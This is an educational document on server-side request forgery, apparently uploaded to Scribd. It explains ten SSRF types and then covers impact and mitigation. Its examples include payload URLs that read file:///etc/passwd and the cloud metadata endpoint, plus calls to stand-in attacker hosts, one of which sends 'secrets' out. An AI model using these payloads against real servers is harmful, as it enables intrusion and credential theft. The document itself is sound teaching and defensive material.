Scribd
Upload
19 views

SSRF

what is ssrf ?

Uploaded by

anurag.21bcan254
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
19 views

SSRF

what is ssrf ?

Uploaded by

anurag.21bcan254
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 11

SSRF

# WHAT IS SSRF

Server-side request forgery is a web security vulnerability that


allows an attacker to cause the server-side application to make
requests to an unintended location.
In a typical SSRF attack, the attacker might cause the server to
make a connection to internal-only services within the
organization's infrastructure. In other cases, they may be able
to force the server to connect to arbitrary external systems. This
could leak sensitive data, such as authorization credentials.

# WHAT ARE THE TYPES OF SSRF ?

Server-Side Request Forgery (SSRF) can be categorized into


several types based on how it is exploited and the kind of target
systems involved. Below are the primary types:

1. Basic SSRF
The attacker uses the vulnerability to access both internal and
external resources directly.
 Example:
Input: http://internal-api.local/admin
Effect: The server fetches an internal URL, exposing
sensitive data.

2. Blind SSRF
In blind SSRF, the attacker cannot see the direct response but
can infer success or failure indirectly (e.g., by observing server
behavior, logs, or timing).
 Example Exploits:
o Trigger DNS lookups by inputting: http://attacker-
domain.com. The attacker detects the server's IP by
monitoring DNS queries.
o Use timing to detect differences in how long the
server takes to respond to different requests.

3. SSRF via HTTP Redirection


The attacker provides a URL that redirects the server to another
target.
 Example:
o Input URL: http://malicious-site.com/redirect-to-
internal
o Redirects to: http://internal-service/admin.
4. Protocol-Specific SSRF
Exploits SSRF vulnerabilities to use non-HTTP protocols, such as
FTP, SMB, or file schemes.
 Example Exploits:
o Fetching files using the file:// scheme:
file:///etc/passwd
o Interacting with services using gopher:// or ftp://.

5. Recursive SSRF (or SSRF Chaining)


The attacker chains multiple SSRF requests together to escalate
the attack or bypass restrictions.
 Example: Use an SSRF vulnerability to pivot through
multiple internal services, eventually accessing critical
resources.

6. Cloud Metadata SSRF


Specifically targets cloud environments by exploiting SSRF to
access metadata endpoints, such as AWS, GCP, or Azure
metadata.
 Example:
o Target URL: http://169.254.169.254/latest/meta-data/
o Result: Retrieves sensitive information like access
tokens or instance details.

7. Out-of-Band (OOB) SSRF


Similar to blind SSRF but relies on external interaction for
feedback. The attacker triggers the server to send requests to
an external resource they control, then monitors that resource
for signs of the attack.
 Example: Input a URL like http://attacker-controlled-
server.com, then monitor the server's incoming HTTP
requests.

8. Time-Based SSRF
The attacker infers success or failure by observing differences in
server response times, often used in blind SSRF scenarios.
 Example:
o Query an internal service, causing a delay due to
resource contention.
o Query a non-existent service, resulting in an
immediate error.

9. SSRF for Port Scanning


The attacker uses SSRF to scan for open ports or services on
internal networks.
 Example:
o Test different ports: http://internal-service:22,
http://internal-service:80.
o Response times and errors reveal which ports are
open.

10. SSRF for Data Exfiltration


The attacker uses SSRF to extract sensitive data by including the
data as part of the request or response.
 Example:
o Fetch a sensitive file: http://internal-service/file?
name=/etc/passwd.
o Send data externally:
http://attacker-site.com/upload?data=secrets.

Preventing SSRF
 Enforce strict input validation and URL whitelisting.
 Restrict outgoing requests to known, trusted domains.
 Use network segmentation to isolate sensitive services.
 Block access to IP ranges like 169.254.0.0/16 (cloud
metadata) and private IP ranges (10.x.x.x, 192.168.x.x).
 Monitor and log unusual server requests.

# IMPACT & MITIGATION MEASURES OF SSRF

Impact of SSRF
1. Access Internal Systems: Exploit private services like APIs,
databases, or admin panels.
2. Data Leakage: Steal sensitive information (e.g., credentials,
configuration files).
3. Remote Code Execution (RCE): Execute malicious code via
misconfigured services.
4. Port Scanning: Discover open ports and services for
further attacks.
5. Abuse and DDoS: Use the server as a proxy for malicious
activities.
6. Cloud Exploits: Access cloud metadata to hijack
credentials.
Mitigation Measures
1. Validate Inputs: Whitelist trusted URLs/domains; block
private IPs.
2. Restrict Network Access: Limit outbound requests and
block internal IP ranges.
3. Enforce URL Restrictions: Allow only approved schemes
(e.g., http://).
4. Cloud Protections: Use secure configurations like AWS
IMDSv2.
5. Use a WAF: Block SSRF patterns with Web Application
Firewalls.
6. Monitor and Log: Detect unusual request behavior.
7. Rate Limits and Timeouts: Prevent abuse and mitigate
blind SSRF.
8. Test Regularly: Identify vulnerabilities via pentests and
scans.
# LABS

You might also like